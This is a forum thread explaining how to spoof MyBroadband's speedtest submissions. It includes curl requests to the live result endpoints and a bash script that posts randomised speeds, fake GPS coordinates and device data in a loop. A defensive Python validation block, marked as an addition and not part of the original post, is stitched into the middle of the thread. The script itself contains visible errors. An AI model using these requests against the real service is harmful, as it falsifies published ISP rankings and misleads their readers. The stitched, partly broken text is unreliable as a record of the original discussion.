Deconstructing MyBroadband's Speedtest system

Mr Scratch

Hey there,

I was going to write a better post, but I'm busy so I decided to just post what I had written so far.

MyBroadband's current system of measuring speedtests, which are then used as analytics data for their various partners, can easily be spoofed.

(1)
MyBroadband's system uses a simple HTTP request to post the data from the client device to their analytics server.

(1.1)

The desktop platform, found here: http://speedtest.mybroadband.co.za uses the following:

curl 'http://speedtest.mybroadband.co.za/get_id.php' -X POST -H -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Content-Length: 0' -H 'DNT: 1' --compressed

This will query the current speedtest ID, which can be popped into
to view the current and all previous tests.

curl 'http://speedtest.mybroadband.co.za/result.php' -H 'Connection: keep-alive' -H 'DNT: 1' --data 'action=results&session=75e65d472ac9851c217d091f8c3f9245&latencyResult=5&latencyLegacy=0&downloadResult=76109&downloadDataSize=360688&downloadLegacy=0&uploadResult=45460&uploadDataSize=144849&uploadLegacy=0&longitude=&latitude=&accuracy=&unit=1000&server=Johannesburg&version=11&hash=f7bebdd7453414683507e81c3bf53659' --compressed

The above is where things get tasty (I chose to remove some information). I can simply edit the above data, and POST it, creating a valid result, which will then be used as part of the next "Top ISP blah blah" article. The same can be done for MyBroadband's mobile apps on iOS and Android - both on WiFi and cellular. Continue reading.

(1.2)

On the mobile apps, I can spoof both connection information, and geographic information.

Code:
#!/bin/bash
###############
#Generate spoofed GPS data from: http://www.geomidpoint.com/random/ in tab separated format and paste into geo_raw.txt
#awk '{print $2 " " $4}' geo_raw.txt > geo_data.txt
#Now geo_data.txt has $latitude $longitude formatted data
################

spoofedAccuracy="3"
spoofedDevice="iPhone X (GSM)"

while read -r geoData
	do
		clear
		spoofedLatitude=$(echo $geoData | awk '{print $1}')
		spoofedLongitude=$(echo $geoData | awk '{print $2}')
		spoofedHash=$(date +%s | md5sum | awk '{print $1}')
		spoofedDownload=$(( ( RANDOM % 50000 )  + 1 ))
		spoofedUpload=$(( ( RANDOM % 50000 )  + 1 ))
		spoofedLatency=$(( ( RANDOM % 20 )  + 1 ))
		curl -i -s -k  -X $'POST' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: okhttp/3.6.0' --data-binary $'action=result&ccode=za&longitude='$spoofedLongitude'&latitude=-'$spoofedLongitude'&accuracy=3&coordinates_mode=1&latency='$spoofedLatency'&download='$spoofedDownload'&upload='$spoofedUpload'&data_download=1654716&data_upload=34850&legacy=0&threads=10&misc=[B]%7B%221%22%3A%22357665058790519%22%2C%222%22%3A%22655020004420395%22%2C%223%22%3A%228ta%22%2C%224%22%3A%2265502%22%2C%225%22%3A%22za%22%2C%226%22%3A%22TelkomSA%22%2C%227%22%3A%2265502%22%2C%228%22%3A%22za%22%2C%2221%22%3A-127%2C%2222%22%3A%22Rockchip%22%2C%2223%22%3A%22H81930I%22%2C%229%22%3A56021515%2C%2210%22%3A2143813%2C%2211%22%3A19441912%2C%2212%22%3A441728%2C%2213%22%3A36579603%2C%2214%22%3A1702085%2C%2215%22%3A101%2C%2216%22%3A79732%2C%2245%22%3A309%2C%2226%22%3A-91%2C%2227%22%3A11%2C%2225%22%3A15%2C%2228%22%3A0%2C%2229%22%3A0%2C%2230%22%3A0%2C%2231%22%3A0%2C%2232%22%3A392568%2C%2233%22%3A118360%2C%2234%22%3A62328266%2C%2235%22%3A3023165%2C%2224%22%3A%22102.249.53.117%22%2C%2238%22%3A%225.1.1%22%2C%2239%22%3A%220%22%2C%2240%22%3A-1%2C%2241%22%3A-1%2C%2242%22%3A2%2C%2243%22%3A14%2C%2244%22%3A21%2C%2248%22%3A%221.4.1.0%22%2C%2249%22%3A%221%22%2C%2250%22%3A%22Auto%20select%20server%22%2C%2251%22%3A15%2C%2253%22%3A14%2C%2236%22%3A400%2C%2237%22%3A10118325246%7D&hash=7ebcfc2f827f36d83585e377011df1d5' [/B]$'http://speedtest.mybroadband.co.za/apps/gateway.php'
		echo $spoofedDownload
		echo $spoofedUpload	
		echo $spoofedLatency
	done < geo.txt
done;


The encoded part in bold can be decoded to:
Code:
{"1":"357665058790519","2":"655020004420395","3":"8ta","4":"65502","5":"za","6":"TelkomSA","7":"65502","8":"za","21":-127,"22":"Rockchip","23":"H81930I","9":56021515,"10":2143813,"11":19441912,"12":441728,"13":36579603,"14":1702085,"15":101,"16":79732,"45":309,"26":-91,"27":11,"25":15,"28":0,"29":0,"30":0,"31":0,"32":392568,"33":118360,"34":62328266,"35":3023165,"24":"102.249.53.117","38":"5.1.1","39":"0","40":-1,"41":-1,"42":2,"43":14,"44":21,"48":"1.4.1.0","49":"1","50":"Auto select server","51":15,"53":14,"36":400,"37":10118325246}

From the above, run on an Android test device, we can see that they collect information about the device's SIM network, current network, device name and hardware, OS version, app version, server used, and location information, which can all be spoofed.

(2)
MyBroadband publishes their analytics data, sourced from the speedtest system, on their news site. This can potentially be abused by network operators or ISPs to improve their own image, or damage the image of their competitors.
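
A defensive counterpart to the spoofing described in the post above, added here as an example and not MyBroadband's code or part of the original post: the server accepts a submitted result only once per session and only if the claimed download speed agrees with what the server itself served. The field names come from the `result.php` request in the post; the session store, the `record_transfer` hook, the tolerance and the kbit/s unit are assumptions.

```python
# Added example: server-side plausibility checks for a submitted speedtest result.
# Field names come from the result.php request in the post; the session store,
# the server-observed counters and the kbit/s unit are assumptions.
import secrets
from urllib.parse import parse_qs

TOLERANCE = 0.25  # accept claims within 25% of what the server itself measured

def issue_session(store):
    """Create a single-use session id and remember it server-side."""
    sid = secrets.token_hex(16)
    store[sid] = {"used": False, "bytes_sent": 0, "seconds": 0.0}
    return sid

def record_transfer(store, sid, bytes_sent, seconds):
    """Called by the download endpoint: what the server actually served."""
    store[sid]["bytes_sent"] += bytes_sent
    store[sid]["seconds"] += seconds

def validate_result(store, body):
    """Return (accepted, reason) for a urlencoded result submission."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    state = store.get(form.get("session", ""))
    if state is None:
        return False, "unknown session"
    if state["used"]:
        return False, "session already submitted"
    state["used"] = True  # one result per session, even if it is rejected
    try:
        claimed = int(form["downloadResult"])
        latency = int(form["latencyResult"])
    except (KeyError, ValueError):
        return False, "malformed fields"
    if claimed <= 0 or latency <= 0:
        return False, "non-positive measurement"
    if state["seconds"] <= 0:
        return False, "no transfer observed for session"
    observed = state["bytes_sent"] * 8 / 1000 / state["seconds"]  # kbit/s
    if abs(claimed - observed) > TOLERANCE * observed:
        return False, "claim disagrees with server-side measurement"
    return True, "ok"
```

A client-computed `hash` field cannot provide this guarantee on its own, because whatever computes it ships with the client; the check above relies only on state the server holds.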
 
I'll say this. Once (if) MyBB publishes the results from cellular tests, look at MTN's closely.
 
Noice one. Repped.

EDIT: Hope they don't ban you.
 
No no no...who is going to start an ISP that doesn't exist and nobody has ever heard of...but gets awesome Speedtest results.

FakeWeb Pty Ltd.

Good thing is that none of the shitty IS resellers will, because all their IPs show "Internet Solutions" - so if someone does, it's someone with their own IP ranges.
 
Note - I removed some personally identifiable information from the post for obvious reasons. Attempting to run the commands above may or may not work on your machine. If you do want a working PoC, I may upload one to YouTube.
 
No response from @rpm or any MyBroadband staff?
 
Pretty interesting.
Sadly I didn't progress further into network security, but used to love doing this myself.

Kudos on sharing.
 
Hi all, back from the land of beer.

No word from rpm/MyBroadband - so take that for what you will...
 